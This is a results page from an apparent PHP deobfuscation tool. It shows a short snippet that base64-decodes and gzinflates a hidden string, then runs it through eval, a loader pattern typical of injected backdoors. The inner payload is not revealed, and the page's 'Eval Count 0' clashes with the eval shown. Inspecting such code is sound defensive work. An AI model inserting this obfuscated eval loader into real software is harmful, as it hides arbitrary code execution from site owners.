Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLik..
Decoded Output download
<?php
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUPHJrNAEAWsA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
exit;
?>
Did this file decode correctly?
Original Code
<?php
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TUPHJrNAE\x41Ws\x41";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
exit;
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
htmlspecialchars_decode | 1 |
Stats
MD5 | de30f44821e6a705209acca1af7262c5 |
Eval Count | 0 |
Decode Time | 45 ms |